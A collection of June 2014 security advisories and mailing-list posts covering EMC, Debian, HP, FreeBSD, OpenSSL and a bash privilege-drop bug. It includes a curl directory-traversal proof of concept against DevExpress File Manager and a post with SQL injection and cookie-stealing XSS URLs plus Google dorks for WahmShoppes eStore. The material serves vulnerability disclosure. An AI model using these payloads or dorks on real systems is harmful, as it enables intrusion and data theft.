ESA-2014-024: EMC Documentum Digital Asset Manager Blind DQL Injection Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ESA-2014-024: EMC Documentum Digital Asset Manager Blind DQL Injection Vulnerability EMC Identifier: ESA-2014-024 CVE Identifier: CVE-2014-2503 Severity Rating: CVSS v2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) Affected products: EMC Documentum Digital Asset Manager 6.5 SP3 EMC Documentum Digital Asset Manager 6.5 SP4 EMC Documentum Digital Asset Manager 6.5 SP5 EMC Documentum Digital Asset Manager 6.5 SP6 Summary: EMC Documentum Digital Asset Manager (DAM) announces a security fix to address Blind DQL (Documentum Query Language) Injection vulnerability. Details: The DAM thumbnail proxy server allows unauthenticated users to query objects using a vulnerable URL query string parameter. A malicious attacker can potentially conduct Blind DQL injection attacks using the vulnerable parameter to infer or modify the database contents. Resolution: Customers using EMC DAM 6.5 SP3, 6.5 SP4 and 6.5 SP5 should apply the hotfix from the link given under Link to remedies. Customers using EMC DAM 6.5 SP6 should upgrade to 6.5 SP6 P13 and later as this contains the resolution for this issue. EMC strongly recommends all customers apply the hotfix or upgrade at the earliest opportunity. Link to remedies: The hotfix for EMC DAM 6.5 SP3, 6.5 SP4 and 6.5 SP5 can be downloaded from: https://emc.subscribenet.com/control/dctm/download?element=3888781 File Name: DQL_Injection_with_DAM_Proxy_Server_HotFix.zip. Installation instructions are available in the zip file. EMC DAM 6.5 SP6 P13 and later can be downloaded from: https://emc.subscribenet.com/control/dctm/download?element=4772311 Read and use the information in this EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact EMC Software Technical Support at 1-877-534-2867. Product Security Response Center [security_al...@emc.com] -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.13 (Cygwin) iEYEARECAAYFAlOPQPQACgkQtjd2rKp+ALwnKACfcDgdR3ezraBQEkGZDGkov/ir XLUAoJRWVI9447Xns5IRHc7w+9e/yv8C =efNd -END PGP SIGNATURE-
[SECURITY] [DSA 2947-1] libav security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2947-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff June 04, 2014 http://www.debian.org/security/faq - - Package: libav CVE ID : not available Several security issues have been corrected in multiple demuxers and decoders of the libav multimedia library. A full list of the changes is available at http://git.libav.org/?p=libav.git;a=blob;f=Changelog;hb=refs/tags/v0.8.12 For the stable distribution (wheezy), this problem has been fixed in version 0.8.12-1. For the testing distribution (jessie), this problem has been fixed in version 6:10.1-1. For the unstable distribution (sid), this problem has been fixed in version 6:10.1-1. We recommend that you upgrade your libav packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBAgAGBQJTj0HLAAoJEBDCk7bDfE420NQP/2wJ8uH5UHRQEB7kNPSuG6Xu 7TeKrj3q+XlZVc8zjBzuBlyWsGdzaqTXabCaH+nm7iTU0aWqbZIT7a4FLRRR0IAn imIWGKfRSYpxN/uGYq0I6Usv6fL5Qmh+LJ26QurGAvGUTmY3Q4rkGr+Dg/M4DeaN Ia6SpNVXYdJmWlRhsc6THxQRfzD5a4x+OPdm/7ulHWXlZOOKJFlc3BOaOVza4d27 y3A+00hSz8x+TNIkT+YEgXcqeXQxk/d57d+NEwFVO3YA1aehhWmm/ipNAVVDpUg8 /smFtiBFqwUSGcRhjk0ytyvuyDld9cv+X6VSdVKKAk+DTMoJpg6S2gsNFdRDoMxJ XOLptebxjkH4Ph0CDFZXchHH1utywqJNBencwQQfJ8kaCZBKOUpsynKoh2akgQS8 VOENGsWVVXSE8kHEPego7jl74GDBgxOIqYOC8+2zE40BeLnS2Apkc894YVFFRA+N uxAb3SxCelS7RWFOqYBFcYzaJ0S9mzC3KI1vJ3PHTBn/TGnjcaPgYUaBGdxIJg2g VHoavja83Vifa2Frd9YqdZ+lHsiLUVBSEcaaHH60lnuDBTRrXeof0URPxBZ59Vf0 B2s0gznrWr8xGeys2bs973XGO5VRK+4fyIEDEJ0WYX6tOZur7UCOTfcGXE/GsxIE XkArOt59ZsFLUxnbieHM =g7r+ -END PGP SIGNATURE-
[SECURITY] [DSA 2948-1] python-bottle security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2948-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff June 04, 2014 http://www.debian.org/security/faq - - Package: python-bottle CVE ID : CVE-2014-3137 It was discovered that Bottle, a WSGI-framework for Python, performed a too permissive detection of JSON content, resulting a potential bypass of security mechanisms. For the stable distribution (wheezy), this problem has been fixed in version 0.10.11-1+deb7u1. For the testing distribution (jessie), this problem has been fixed in version 0.12.6-1. For the unstable distribution (sid), this problem has been fixed in version 0.12.6-1. We recommend that you upgrade your python-bottle packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBAgAGBQJTj0HbAAoJEBDCk7bDfE425ToQAKVd+qzgQWMPgKahLtlDz9fF yAN5GG6HcxT9G5TGmTOQ2kundqezmJw2Y/slO8tBJsh8YJDuGXLwqcbpbVj9kLXb X+oYPzARSUUy/HOpVXuD0cy/7713typ85cFC4j2IONl+uqLc1rFD8EikIc1MZQg2 yYKCb/PvE3wwS2Ctko2ODsTTO2VDjzl4Qr14dZUJokbJD6mr0MfxF7ijeygcpLaL wSh6KF6fNnfBEVQg1YBn4ejTy4Ay7QXbaY42LpBMAl7C5FwnC9WI/hudS6SSmwUY OJE2kh7fq/B8wQgdkHh61Sm12oYMSAVdWn4bGumb2Hq/I462ED47fnkfJtfIN0fq Gswamw3eDInibZ36GeB8BG4FmCiCzQxbslmX/gJLojAFTjEIjjIT/s3YiApBPdbc AP1w4ji2QanqhKZB9Al8xLJB7lK25XXiC/0n1rKQz8ZYW3lIgFpoy8jXWxQa+IYp 1oCS2+3Zyuub7Y6siiG6OnYEB8SbY6hP08e/igotCPSXLhhDtkCaI8VJud7U8/Ug Ta99ZqtUVMEEije7Q/FjQqD7eyulr1N9gs/71NTkzZCMkKDcShR/eT9P6AB44hXC CDmFYFpnBPRDjsP5kTOem/nl1iacivZ4FpS5vy+VaRlE2BDYSc6LfXlcBBZT7jp5 TupqBW30QP5WGjICLw72 =MKdR -END PGP SIGNATURE-
[SECURITY] [DSA 2946-1] python-gnupg security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2946-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff June 04, 2014 http://www.debian.org/security/faq - - Package: python-gnupg CVE ID : CVE-2013-7323 CVE-2014-1927 CVE-2014-1928 CVE-2014-1929 Multiple vulnerabilities were discovered in the Python wrapper for the Gnu Privacy Guard (GPG). Insufficient sanitising could lead to the execution of arbitrary shell commands. For the stable distribution (wheezy), these problems have been fixed in version 0.3.6-1~deb7u1. For the testing distribution (jessie), these problems have been fixed in version 0.3.6-1. For the unstable distribution (sid), these problems have been fixed in version 0.3.6-1. We recommend that you upgrade your python-gnupg packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBAgAGBQJTj0GeAAoJEBDCk7bDfE42aroQAJ75f7AJw24Ak+kOjP7G8bas R3duqHp0TZVgIo4qlp/hH7Nv2wEtQVPzUcc2BjlZG/h8olfYnQfINZgBU/qVgXg3 AKYBhO/Vli/ZJO1svH9fJIKNxfzWclZuCqF/rrpd2t+sIxQmdANoV/U/rQ+eAHoS RBPEgrHBsbL8IlufzJcdCE2K1IxFj+4ARuzsLKiZigCAZfg2L/p5W6x+SDPP5Yt0 hGCX/G76iSBwXsoievcPa43m+iGSLpphUankpsknZzfpBCx3vcrznpkP6Lt8S/Se toyKBWXPWQMP77qf5wFxb31Xd/TSLJ+wZtK4Sl5pEOD25B4I59YcMlSxzNj/AGGs R34jImIdAuCuVEP5oeq2bE4Ps0i0lbZwmDzJ9hNHhZ1lbs4CLehECWCFS0FYuqux FgdXydAWcgLw9YOQM42jWg6m8kt3zzcrv9zjyC2wX/IQG3E8/h7q3I356Bw1wboQ wX5GI5uaA1uNFq0fY3htbxEwN5J+skazVr0sns+JfQcPJtOtbM+L8HdJ6so+wpgr crmbljhd/vpEQGI2UcF05zympdhP7ss4S/Sapn9c6Ws/XZl4JfUoaU6FKtUY7c/2 n/ZNfD/V9SxW7cgA0qQUm9NvOXa0BkynxyZ0aU/DrUEyvPWMQRU5qwraLU8noUHZ gDxLHLrhunBSY+71FPg1 =0p3h -END PGP SIGNATURE-
[security bulletin] HPSBMU03033 rev.3 - HP Insight Control Software Components running OpenSSL, Remote Disclosure of Information
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04272892 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04272892 Version: 3 HPSBMU03033 rev.3 - HP Insight Control Software Components running OpenSSL, Remote Disclosure of Information NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2014-04-30 Last Updated: 2014-06-02 Potential Security Impact: Remote disclosure of information Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP Insight Control software components running OpenSSL. This is the OpenSSL vulnerability known as Heartbleed which could be exploited remotely resulting in disclosure of information. Note: additional information regarding the OpenSSL Heartbleed vulnerability concerning HP Servers products is available at the following HP Customer Notice: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_n a-c04239413 References: CVE-2014-0160, SSRT101550 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Insight Control impacted software component products and versions HP Insight Control 7.2.x and 7.3.x HP Systems Insight Manager v7.2, v7.2.1, v7.2.2, v7.3, and v7.3.1 bundled with the following software: HP Smart Update Manager (SUM) v6.0.0 through v6.3.0 HP System Management Homepage (SMH) v7.1.2, v7.2, v7.2.1, v7.2.2, v7.3, v7.3.1 for Linux and Windows WMI Mapper for HP Systems Insight Manager v7.2.0, v7.2.1, v7.2.2, v7.3, and v7.3.1 HP Version Control Agent (VCA) v7.2.0, v7.2.1, v7.2.2, v7.3.0, and v7.3.1 for Windows HP Version Control Agent (VCA) v7.2.2, v7.3.0, and v7.3.1 for Linux HP Version Control Repository Manager (VCRM) v7.2.0, v7.2.1, v7.2.2, v7.3.0, and v7.3.1 for Windows HP System Management Homepage (SMH) v7.1.2, v7.2, v7.2.1, v7.2.2, v7.3, v7.3.1 for Linux and Windows HP Insight Control server deployment v7.1.2, v7.2.0, v7.2.1, and v7.2.2 HP Insight Control server migration v7.3 and v7.3.1 BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2014-0160(AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has addressed this vulnerability for the impacted HP Insight Control software components in the following software updates and security bulletins. HP Insight Control 7.2.x installations HP Systems Insight Manager 7.2 hotfix available at the following location: http://h18013.www1.hp.com/products/servers/management/hpsim/download.html Note: This installer updates HP SIM, SMH, WMI Mapper, and VCA/VCRM. HP Insight Control Control 7.3.and 7.3u1 installations HP Insight Management 7.3.0a available at the following location: http://www.hp.com/go/insightupdates Note: This installer updates HP SIM, SMH, WMI Mapper, VCA/VCRM, and Insight Control server migration. Please check the following security bulletins for each of these and the additional HP products. HP Insight Control software components HP Security Bulletin Security Bulletin Location HP Systems Insight Manager (SIM) HPSBMU03022 https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_ na-c04263236 HP Smart Update Manager (SUM) HPSBMU02997 https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_ na-c04239375 HP System Management Homepage (SMH) HPSBMU02998 https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_ na-c04239372 WMI Mapper for HP Systems Insight Manager HPSBMU03013 https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_ na-c04260385 HP Version Control Agent (VCA) and Version Control Repository Manager (VCRM) on Linux and Windows HPSBMU03020 https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_ na-c04262472 HP Insight Control server deployment HPSBMU03024 https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_ na-c04267749 HP Insight Control server migration HPSBMU03029 https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_ na-c04268240 HISTORY Version:1 (rev.1) - 30 April 2014 Initial release Version:2 (rev.2) - 2 May 2014 Added information for HP Insight Control server migration Version:3 (rev.3) - 2 June 2014 Updated solution information Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about
Re: [FD] [oss-security] Bug in bash = 4.3 [security feature bypassed]
On 04/06/14 11:13, Jose Carlos Luna Duran wrote: In my opinion the drop of privs in bash was mostly a help measure for poorly written setuid programs executing system() calls. I don't think is the role of bash to do this as the problem that could be exploited by that would really be in the original program that does not drop privs before invoking the shell. This has been known for some time in some circles at least, but as I said the problem would really be in the non-priv-dropping privileged program, that's why most people did not really care that much. Last year there was a vuln that is very much related to this subject: http://blog.cmpxchg8b.com/2013/08/security-debianisms.html We already knew that this bug was known by the Bash developers. Correct me if I'm wrong, but even in that case there is another help measure that has been implemented at least in linux kernels 3.1: http://lxr.free-electrons.com/source/kernel/sys.c?v=3.1#L628 Therefore setuid calls do not fail anymore even in the case of existing resource limits for processes (in linux). You can still exploit this in the 2.6.x Linux kernel. The 2.6.x versions are still in widespread use. (Red Hat Enterprise Linux version 6.5, released a few time ago, is based on version 2.6.32. Possibly Red Hat changed the RLIMIT_NPROC behavior, but there are other 2.6.x-based Linux distributions also.) But in any case, for the sake of correctness I agree that the drop_priv code should be fixed (or just completely removed...). I agree but If finally they decide to remove the code it would seems as a consequence of the disclosure. Right now it has more sense to fix the bug. This is because this vulnerability (thanks to help measure in the kernel) is more difficult to exploit. So, the drop privilege code has more sense nowadays than when was initially coded. 2014-06-03 16:16 GMT+02:00 Hector Marco hecma...@upv.es: Hi everyone, Recently we discovered a bug in bash. After some time after reporting it to bash developers, it has not been fixed. We think that this is a security issue because in some circumstances the bash security feature could be bypassed allowing the bash to be a valid target shell in an attack. We strongly recommend to patch your bash code. Why don't fix this bug by simple adding mandatory if clause ? Any comments about this issue are welcomed. Details at: http://hmarco.org/bugs/bash_4.3-setuid-bug.html Thanks you, Hector Marco http://hmarco.org
Re: [FD] [oss-security] Bug in bash = 4.3 [security feature bypassed]
Jose Carlos Luna Duran writes: In my opinion the drop of privs in bash was mostly a help measure for poorly written setuid programs executing system() calls. I don't think is the role of bash to do this ... True, but it is a slight help and I'm in favour of keeping it. Correct me if I'm wrong, but even in that case there is another help measure that has been implemented at least in linux kernels 3.1: http://lxr.free-electrons.com/source/kernel/sys.c?v=3.1#L628 For permanent dropping of privilege I suggest calling setgid() and setuid() to the desired values *twice* (and ignore the return code). Then try to reset to the original values (should fail; ignore return code). Then test that the real and effective values are the same and are the ones you want - that's the result that indicates success in this case. And exit() if failed. That's the simple usage guide - David Wagner has written at length on the technicalities.
Re: Bug in bash = 4.3 [security feature bypassed]
On 03/06/14 23:46, Hector Marco wrote: Recently we discovered a bug in bash. After some time after reporting it to bash developers, it has not been fixed. ... Any comments about this issue are welcomed. Details at: http://hmarco.org/bugs/bash_4.3-setuid-bug.html I'm only going by the patch presented above, so ... 1. The program should be calling setgid() before setuid() (which is another common class of security mistake). 2. Why is exit() returning values greater than 255? It's not capable of doing that under (most) Unix environments. -- Regards, Daryl Tester Handcrafted Computers Pty. Ltd.
[RT-SA-2014-006] Directory Traversal in DevExpress ASP.NET File Manager
Advisory: Directory Traversal in DevExpress ASP.NET File Manager During a penetration test RedTeam Pentesting discovered a directory traversal vulnerability in DevExpress' ASP.NET File Manager and File Upload. Attackers are able to read arbitrary files by specifying a relative path. Details === Product: DevExpress ASPxFileManager Control for WebForms and MVC Affected Versions: DevExpress ASPxFileManager v10.2 to v13.2.8 Fixed Versions: DevExpress ASPxFileManager v13.2.9 Vulnerability Type: Directory Traversal Security Risk: high Vendor URL: https://www.devexpress.com/Products/NET/Controls/ASP/File-Upload-Explorer/ Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-006 Advisory Status: published CVE: CVE-2014-2575 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2575 Introduction The DevExpress ASP.NET Subscription includes a standalone Multi-File Upload Manager for WebForms and MVC and a pre-built File Manager for WebForms; built so you can instantly introduce file management capabilities in your next web application. (from DevExpress' Homepage) More Details The ASPX File Manager component is prone to a directory traversal vulnerability. Attackers with access to the File Manager component can read arbitrary files on the same partition as the shared directory. A common request to download a file via the File Manager component requires multiple HTTP-Post parameters: __EVENTTARGET=ctl00%24ContentPlaceHolder1%24ASPxFileManager1 __EVENTARGUMENT=13%7Cfile.ext __EVENTVALID= The parameter __EVENTARGUMENT=13|file.ext specifies a file download and the file which is to be downloaded. Attackers may also request files outside of the shared directory by prepending a relative path to a parent directory. Proof of Concept By requesting files with a relative path, files otherwise not available will be accessible through the File Manager component. Depending on the shared directory and the webserver configuration, the webserver configuration file might for example be accessible through the File Manager component: __EVENTARGUMENT=13|../../web.config Other sensitive operating system files could be affected, too. Example exploit: curl --data __EVENTTARGET=ctl00%24ContentPlaceHolder1%24ASPxFileManager1\ __EVENTARGUMENT=13%7C../../web.config=__EVENTVALID \ http://example.com/FileManagerComponent.aspx The request above will download the specified file. Workaround == Instead of a physical file system provider, a database file system provider with limited access permissions could be used. Fix === Update ASPxFileManager control to DevExpress libraries version v13.2.9. Security Risk = The risk is estimated to be high. This vulnerability allows attackers to access arbitrary files on the same partition as the File Manager's root directory. This may allow attackers to read sensitive information like the webserver configuration. Timeline 2014-03-10 Vulnerability identified 2014-03-21 Customer approved disclosure to vendor 2014-03-21 CVE number requested and assigned 2014-03-25 Vendor notified 2014-04-11 Customer opened support ticket with vendor 2014-04-17 Vendor released fixed version 2014-04-17 Vendor released security advisory to customers 2014-06-05 Advisory released References == Vendor Security Advisory: http://security.devexpress.com/de7c4756/?id=ff8c1703126f4717993ac3608a65a2e2 RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: Digital signature
[SECURITY] [DSA 2950-1] openssl security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2950-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff June 05, 2014 http://www.debian.org/security/faq - - Package: openssl CVE ID : CVE-2014-0195 CVE-2014-0221 CVE-2014-0224 CVE-2014-3470 Multiple vulnerabilities have been discovered in OpenSSL: CVE-2014-0195 Jueri Aedla discovered that a buffer overflow in processing DTLS fragments could lead to the execution of arbitrary code or denial of service. CVE-2014-0221 Imre Rad discovered the processing of DTLS hello packets is susceptible to denial of service. CVE-2014-0224 KIKUCHI Masashi discovered that carefully crafted handshakes can force the use of weak keys, resulting in potential man-in-the-middle attacks. CVE-2014-3470 Felix Groebert and Ivan Fratric discovered that the implementation of anonymous ECDH ciphersuites is suspectible to denial of service. Additional information can be found at http://www.openssl.org/news/secadv_20140605.txt For the stable distribution (wheezy), these problems have been fixed in version 1.0.1e-2+deb7u10. All applications linked to openssl need to be restarted. You can use the tool checkrestart from the package debian-goodies to detect affected programs or reboot your system. There's also a forthcoming security update for the Linux kernel later the day (CVE-2014-3153), so you need to reboot anyway. Perfect timing, isn't it? For the unstable distribution (sid), these problems will be fixed soon. We recommend that you upgrade your openssl packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBAgAGBQJTkFmLAAoJEBDCk7bDfE42KeEP/2arDOfqKC72VOtJ+T7jwjTP x4vdXKCFvDknNTs4sf4/BPa1UeNu2xANWl9UcpueE9UKInuGP61+UeAuyAjBNHiz GOz1zQ1DvqK71JmlIvK4bnTAnwTHDOwvlNABGPWiahnzhbLDN2eFnNLTT3S33FL7 DDuD5UXvtroNYcPF1N7Uvze3oG1rBIilrX+lmFE+I52v4+TRZJKgUfuydX3OO+z7 gRGsI5nEFff4xe32N32AVh90yf0UbR783BBAW+NZuxsmRFOJ06CvpjmAuycAk33X 1IOkCwxSXtWOlOsi1k1sTK0EvDyB4bY1NSMqNUXgxmZ/IQld25CO4lRZCJj8QBA6 DhFRfEg+70anqZ6uI5+DvG8ichNNpPg8CKKNTv2aGUrKVjFT2jzN6L/d3wBXBqCF TkDemP/MKu31dU+KmR8TSG1q08satChdbHHdila3wkjOy1PdJF7ksKUjkRq0mMW2 hn/V60Dc0KMZ1O4cj8b369Ngt57ma9wdgNKzD7GNnqucEV2RT7pwSSVAfCUzPopn KAo3z4SQAyR1HOQP17yH7XoVlwLcpo8Orqvnktz2D9M2ehsopjfNEvLaCkaRRO1t 1IQwbDdjCEStLwbFqdxQA4RfpQU0Fhq01AuuA7/exy5yZrq8So6NarGdpnesTqGa tsd2gjmQwj7gbB+qL7zk =MUFq -END PGP SIGNATURE-
[SECURITY] [DSA 2949-1] linux security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2949-1 secur...@debian.org http://www.debian.org/security/ Salvatore Bonaccorso June 05, 2014 http://www.debian.org/security/faq - - Package: linux CVE ID : CVE-2014-3144 CVE-2014-3145 CVE-2014-3153 Several vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service or privilege escalation: CVE-2014-3144 / CVE-2014-3145 A local user can cause a denial of service (system crash) via crafted BPF instructions. CVE-2014-3153 Pinkie Pie discovered an issue in the futex subsystem that allows a local user to gain ring 0 control via the futex syscall. An unprivileged user could use this flaw to crash the kernel (resulting in denial of service) or for privilege escalation. For the stable distribution (wheezy), these problems have been fixed in version 3.2.57-3+deb7u2. For the unstable distribution (sid), these problems will be fixed soon. We recommend that you upgrade your linux packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCgAGBQJTkFu1AAoJEAVMuPMTQ89EkU8P/3XPmOVUppOUURzEK8T3SwrV wGgGE8Ab51f/bDaI7bzUlQ7q8SkMoPhYbQFYLVcLuMnkKOo4Vgdb5hRHS3BdGnuh UB/X3fzYFZ4NDy07V3LwvSCrTV3gZgB9Mf8HkmohDjeLkBgiTMgcW0K9AAJKqxKY 5vVkvhuufuDB3aX2rtTqoJmOv1kopQB0CI6ESQS2lyu0XeDDibXMAV6N4HIQkasu 5VCr/t6jRbjpBMyENeWzXsGKtllmnGwnwWzkvYg8cpFtZPOeyKtvUBz2a6WdT0u0 x7DLBTIvk7HudBwL9mhOYs9Av1rtnc1Ch9DupJL1XeOew+Bd6o4MXZxTlnJt70JZ U4xb09K607bbMhfTrxkaYp8UMEo1VjeoY3Xi+Qx7qbgVq6BUGko8n93fgYH19/uc q1l3ESDz0bNQneKDNgQJ3es7eVgs4Cxsx+X9R3PxTF5+eH3mtkmJRab7EIgyWYbe Y7JrqX59bMkFRbAHE+9LGYVqbXpBv2Jp3cpeAB0Z/XjGEQY8bRkIYRPE1gz0t+Yn axbkCyfLppAJ3TCnaDEQ658smuMh3donXLevPEN/dIVYzZtXRs32afRutiFysZJa 9azBg91Wi+vX+UDvAn334JnSaaD1OA0WRTq35tDulrZj3Zoo7y/NE6Fk1ibyL8zd 4FS2CjFBWKAMiALb3cTR =EgOI -END PGP SIGNATURE-
FreeBSD Security Advisory FreeBSD-SA-14:14.openssl
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-14:14.opensslSecurity Advisory The FreeBSD Project Topic: OpenSSL multiple vulnerabilities Category: contrib Module: openssl Announced: 2014-06-05 Affects:All supported versions of FreeBSD. Corrected: 2014-06-05 12:32:38 UTC (stable/10, 10.0-STABLE) 2014-06-05 12:33:23 UTC (releng/10.0, 10.0-RELEASE-p5) 2014-06-05 12:53:06 UTC (stable/9, 9.3-BETA1) 2014-06-05 12:53:06 UTC (stable/9, 9.3-BETA1-p2) 2014-06-05 12:33:23 UTC (releng/9.2, 9.2-RELEASE-p8) 2014-06-05 12:33:23 UTC (releng/9.1, 9.1-RELEASE-p15) 2014-06-05 12:32:38 UTC (stable/8, 8.4-STABLE) 2014-06-05 12:33:23 UTC (releng/8.4, 8.4-RELEASE-p12) CVE Name: CVE-2014-0195, CVE-2014-0221, CVE-2014-0224, CVE-2014-3470 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit URL:http://security.FreeBSD.org/. I. Background FreeBSD includes software from the OpenSSL Project. The OpenSSL Project is a collaborative effort to develop a robust, commercial-grade, full-featured Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library. II. Problem Description Receipt of an invalid DTLS fragment on an OpenSSL DTLS client or server can lead to a buffer overrun. [CVE-2014-0195] Receipt of an invalid DTLS handshake on an OpenSSL DTLS client can lead the code to unnecessary recurse. [CVE-2014-0221] Carefully crafted handshake can force the use of weak keying material in OpenSSL SSL/TLS clients and servers. [CVE-2014-0224] Carefully crafted packets can lead to a NULL pointer deference in OpenSSL TLS client code if anonymous ECDH ciphersuites are enabled. [CVE-2014-3470] III. Impact A remote attacker may be able to run arbitrary code on a vulnerable client or server by sending invalid DTLS fragments to an OpenSSL DTLS client or server. [CVE-2014-0195] A remote attacker who can send an invalid DTLS handshake to an OpenSSL DTLS client can crash the remote OpenSSL DTLS client. [CVE-2014-0221] A remote attacker who can send a carefully crafted handshake can force the use of weak keying material between a vulnerable client and a vulnerable server and decrypt and/or modify traffic from the attacked client and server in a man-in-the-middle (MITM) attack. [CVE-2014-0224] A remote attacker who can send carefully crafted packets can cause OpenSSL TLS client to crash. [CVE-2014-3470] IV. Workaround No workaround is available. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 10.0] # fetch http://security.FreeBSD.org/patches/SA-14:14/openssl-10.patch # fetch http://security.FreeBSD.org/patches/SA-14:14/openssl-10.patch.asc # gpg --verify openssl-10.patch.asc [FreeBSD 9.x and 8.x] # fetch http://security.FreeBSD.org/patches/SA-14:14/openssl-9.patch # fetch http://security.FreeBSD.org/patches/SA-14:14/openssl-9.patch.asc # gpg --verify openssl-9.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch /path/to/patch c) Recompile the operating system using buildworld and installworld as described in URL:http://www.FreeBSD.org/handbook/makeworld.html. Restart all deamons using the library, or reboot the system. 3) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/8/ r267103 releng/8.4/ r267104 stable/9/ r267106 releng/9.1/ r267104 releng/9.2/ r267104 stable/10/
multiple Vulnerability in WahmShoppes eStore
#+ # Title : multiple Vulnerability in WahmShoppes eStore # Author : alieye # vendor : http://www.wahmshoppes.com/ # Contact : cseye...@yahoo.com # Risk : High # Class: Remote # Google Dork: # inurl:WsError.asp # inurl:store/ We apologize but your request rendered no results # Version: all version # Date: 05/06/2014 # 1-Blind SQL Injection http://victim.com/store/WsDefault.asp?One=-999 AND 1=1+UNION+SELECT+...etc - 2-Cross Site Scripting http://victim.com/store/WsError.asp?msg=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E http://victim.com/store/WsRequestpwd.asp?msg=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E - 3-Information Disclosure in image location http://victim.com/store/thumb.asp?path=X:/server path and domain name/example.jpg - 4-show admin panel tools http://victim.com/store/frmLeft.asp - Admin page http://victim.com/store/admin/Default.asp # [#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph , f4rm4nd3 and all cseye members [#] Thanks To All Iranian Hackers [#] website : http://cseye.vcp.ir/ #
ESA-2014-046: EMC Documentum Content Server Multiple Vulnerabilities
